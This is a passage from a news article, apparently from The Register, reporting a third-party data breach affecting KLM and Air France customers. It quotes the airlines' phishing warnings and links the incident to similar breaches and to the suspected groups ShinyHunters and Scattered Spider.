"No sensitive data such as passwords, travel details, Flying Blue miles, passport, or credit card information was stolen."
The airlines did not publicly specify the types of data that were stolen, but the exclusion of sensitive data suggests basic personal information was involved.
However, customer notifications circulating online noted that first and family names, along with contact details, Flying Blue numbers and tier levels, and the subject lines of service request emails were accessed.
KLM and Air France advised customers to be on heightened alert for phishing attempts. Both said they had referred themselves to the Dutch and French data protection authorities, respectively.
The customer notice from Barry ter Voert, chief experience officer at KLM, read: "We recommend staying alert when receiving messages or other communication using your personal information, and to be cautious of any suspicious activity. The data involved in this breach could be used to make phishing messages appear more credible. If you receive unexpected messages or phone calls, especially asking for personal information or urging you to take action, please check their authenticity.
"We understand the concern this may cause, and we deeply regret any inconvenience this may have caused you."
The Register approached the companies for additional information but they did not comment beyond the public statement.
The attack marks the latest in a string of data lapses at major organizations that also blamed a third party.
In recent weeks, luxury retailers Dior, Chanel, and Pandora all reported similar leaks at third party providers, as did Google, Qantas, and Allianz.
All of the above declined to identify the third party in question except for Google, which said this week that one of its Salesforce instances was raided.
None of the victims have attributed their attacks to any group – yet – but the prime suspect behind all of these intrusions is the ShinyHunters cybercrime crew, which is perhaps best known for its role in last year's attacks on Snowflake customers.
Scattered Spider also changed its focus toward airlines earlier this year, and some researchers said it could be behind the attack on Hawaiian Airlines in June.
Check Point said last month that the attacks on Qantas and WestJet, which occurred within three weeks of one another, bore hints of Scattered Spider's involvement, mainly because of the tradecraft that led to the intrusions.